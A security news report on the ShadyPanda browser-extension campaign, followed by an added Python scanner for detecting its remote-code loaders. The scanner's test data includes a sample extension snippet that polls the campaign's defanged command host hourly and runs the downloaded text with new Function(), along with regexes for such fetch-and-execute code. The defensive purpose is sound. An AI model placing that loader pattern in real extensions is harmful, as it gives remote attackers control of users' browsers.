Shadypanda Browser Extensions Amass 4.3m Installs In Malicious...

A long-running malware operation known as "ShadyPanda" has amassed over 4.3 million installations of seemingly legitimate Chrome and Edge browser extensions that evolved into malware.

The operation, discovered by Koi Security, unfolded in distinct phases that gradually introduced additional malicious functionality, turning the browser extension from a legitimate tool into spyware.

The ShadyPanda campaign comprises 145 malicious extensions (20 Chrome and 125 Edge) published over the years. While Google has removed them from the Chrome Web Store, Koi reports that the campaign remains active on the Microsoft Edge Add-ons platform, with one extension listed as having 3 million installs.

It is unclear whether the install counts of these extensions were artificially inflated to make them appear more legitimate.

While the initial submissions of ShadyPanda extensions occurred in 2018, the first signs of malicious activity were observed in 2023, with a set of extensions posing as wallpaper and productivity tools.

According to Koi researchers, these extensions engaged in affiliate fraud by injecting tracking codes from eBay, Booking.com, and Amazon into legitimate links to generate revenue from users' purchases.

In early 2024, an extension called Infinity V+ began performing search hijacking, indicating that the ShadyPanda operators were becoming bolder.

In 2024, five extensions from the set were modified through an update to include a "backdoor" capable of remote code execution. Three of them had been uploaded in 2018 and 2019 and had built up a good reputation in the meantime.

"Every infected browser runs a remote code execution framework. Every hour, it checks api.extensionplay[.]com for new instructions, downloads arbitrary JavaScript, and executes it with full browser API access," explains Koi Security about the backdoor's functionality.

"This isn't malware with a fixed function. It's a backdoor."
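The polling-and-execute behaviour quoted above is what a defender can hunt for in unpacked extension directories. The scanner below is an added example, not Koi Security's tooling: it flags the C2 host named in the report plus code that fetches remote text and hands it to eval()/new Function(); the regexes and the hourly chrome.alarms period are assumptions about how such a loader is typically written, and the two sample extension scripts are constructed.

```python
"""Triage unpacked browser extensions for ShadyPanda-style remote-code loaders."""
import re
from pathlib import Path

# Indicator taken from the report, stored defanged; scan_source matches both forms.
C2_HOSTS = {"api.extensionplay[.]com"}

# Assumed patterns: a network fetch combined with dynamic code execution is the
# core of the described backdoor; an hourly alarm matches its "every hour" polling.
REMOTE_FETCH = re.compile(r"\b(fetch|XMLHttpRequest|importScripts)\b")
DYNAMIC_EXEC = re.compile(r"\b(eval|new\s+Function|setTimeout\s*\(\s*['\"])")
HOURLY_ALARM = re.compile(r"periodInMinutes\s*:\s*60\b")

# Constructed sample extension scripts (not real ShadyPanda code).
SAMPLE_BACKDOOR = """
chrome.alarms.create('sync', { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch('https://api.extensionplay[.]com/task');
  new Function(await r.text())();
});
"""
SAMPLE_BENIGN = """
chrome.storage.local.get('theme', (v) => { document.body.className = v.theme; });
"""


def refang(indicator: str) -> str:
    """Turn a defanged host back into the form found in real source files."""
    return indicator.replace("[.]", ".")


def scan_source(src: str) -> list[str]:
    """Return the list of triage findings for one JavaScript source file."""
    findings = []
    lowered = src.lower()
    for host in C2_HOSTS:
        if host in lowered or refang(host) in lowered:
            findings.append(f"c2-host:{host}")
    if REMOTE_FETCH.search(src) and DYNAMIC_EXEC.search(src):
        findings.append("remote-fetch+dynamic-exec")
    if HOURLY_ALARM.search(src):
        findings.append("hourly-alarm")
    return findings


def scan_extension_dir(root: Path) -> dict[str, list[str]]:
    """Scan every .js file under an unpacked extension directory."""
    results = {}
    for js in root.rglob("*.js"):
        hits = scan_source(js.read_text(errors="ignore"))
        if hits:
            results[str(js.relative_to(root))] = hits
    return results
```

Point scan_extension_dir at a browser profile's Extensions folder to triage every installed extension; any file with both the fetch and dynamic-exec signals deserves manual review even when no known C2 host appears.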

Source: BleepingComputer